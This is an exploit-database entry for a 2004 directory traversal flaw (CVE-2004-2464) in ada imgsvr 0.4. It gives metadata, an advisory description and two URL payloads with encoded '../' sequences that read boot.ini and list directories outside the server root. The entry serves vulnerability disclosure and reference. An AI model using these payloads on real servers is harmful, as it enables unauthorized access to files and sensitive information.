[] NeoSense
E X P L O I T S
title author type platform port cve id

ada imgsvr 0.4 - Directory Traversal

Author: dr_insane
type: remote
platform: windows
port: 
date_added: 2004-04-05 
date_updated: 2013-01-06 
verified: 1 
codes: CVE-2004-2464;OSVDB-4946 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/10048/info

ImgSvr is prone to an issue that may allow an attacker to view files that reside outside of the server root directory. This issue occurs because the application fails to properly sanitize user-supplied URI data.

A successful exploit may allow a remote attacker to access sensitive information that may be used to launch further attacks against a vulnerable system.

To view a selected file:
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2fboot.ini

To list a directory:
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f/
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.